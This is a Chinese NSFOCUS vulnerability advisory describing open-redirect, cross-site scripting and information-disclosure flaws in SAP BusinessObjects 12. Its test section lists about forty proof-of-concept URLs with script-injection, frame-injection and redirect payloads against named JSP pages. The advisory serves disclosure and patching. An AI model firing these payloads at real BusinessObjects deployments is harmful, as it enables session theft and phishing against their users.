绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

SAP BusinessObjects多个输入验证漏洞

发布日期：2010-01-18
更新日期：2010-01-22

受影响系统：

SAP BusinessObjects 12 SP1
SAP BusinessObjects 12

描述：

BUGTRAQ  ID: 37900,37972

SAP BusinessObjects是一款商务智能软件和企业绩效解决方案。

BusinessObjects没有正确地过滤用户提交给CmcApp/App/frameset.jsp、CrystalReports/jsp/common/progress.jsp、PerformanceManagement/scripts/docLoadUrl.jsp页面的name参数，提交给PerformanceManagement/jsp/viewCrystalReport.jsp页面的sReportMode参数以及提交给PlatformServices/preferences.do页面的service参数便在重新定向中使用，远程攻击者可以通过提交恶意参数请求跨域重新定向攻击。

BusinessObjects没有正确地过滤用户提交给AdminTools/querybuilder/ie.jsp和AdminTools/querybuilder/logonform.jsp页面的framework参数、提交给CrystalReports/jsp/CrystalReport_View/viewReport.jsp页面的loc参数、提交给InfoViewApp/jsp/common/actionNavFrame.jsp页面的url参数和提交给PlatformServices/preferences.do页面的service参数便返回给了用户，这可能导致跨站脚本攻击。

通过直接访问tomcat-docs/jspapi/%c0%ae%c0%ae/WEB-INF/web.xml、CmcApp/App/home.jsp、CmcApp/logon.jsp等脚本就可以读取某些系统信息。

<*来源：Richard Brain

  链接：http://secunia.com/advisories/38271/
        http://secunia.com/advisories/38278/
        http://secunia.com/advisories/38217/
        http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr09-02
        http://www.procheckup.com/vulnerability_manager/documents/document_1263821657/attachments/BusinessObj.pdf
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://10.0.2.221:8080/CmcApp/App/frameset.jsp?name=settings&url=http://www.procheckup.com
http://10.0.2.221:6405/CmcApp/App/frameset.jsp?name=settings&url=http://www.procheckup.com
http://10.0.2.221:8080/CrystalReports/jsp/common/progress.jsp?loc1&url=http://www.procheckup.com
http://10.0.2.221:6405/CrystalReports/jsp/common/progress.jsp?loc1&url=http://www.procheckup.com
http://10.0.2.221:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=http://www.procheckup.com
http://10.0.2.221:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=http://www.procheckup.com
http://10.0.2.221:8080/PerformanceManagement/jsp/viewCrystalReport.jsp?sReportMode=""%20name='1'><frame%20src="http://www.procheckup.com"%20name="pro"><"
http://10.0.2.221:6405/PerformanceManagement/jsp/viewCrystalReport.jsp?sReportMode=""%20name='1'><frame%20src="http://www.procheckup.com"%20name="pro"><"
http://10.0.2.221:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=http://www.procheckup.com/
http://10.0.2.221:6405/PlatformServices/preferences.do?cafWebSesInit=true&service=http://www.procheckup.com/
http://10.0.2.221:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://10.0.2.221:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
http://10.0.2.221:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
http://10.0.2.221:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
http://10.0.2.221:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
http://10.0.2.221:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=”></script><script>alert(1)</script>
http://10.0.2.221:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
http://10.0.2.221:6405/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
http://10.0.2.221:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://10.0.2.221:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=”><script>alert(1)</script>
http://10.0.2.221:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
http://10.0.2.221:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
http://10.0.2.221:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
http://10.0.2.221:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
http://10.0.2.221:8080/BusinessProcessBI/axis2-web/HappyAxis.jsp
http://10.0.2.221:6405/BusinessProcessBI/axis2-web/HappyAxis.jsp

建议：

厂商补丁：

SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.sap.com/

浏览次数：3607
严重程度：0（网友投票）

本安全漏洞由绿盟科技翻译整理，版权所有，未经许可，不得转载
绿盟科技给您安全的保障

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客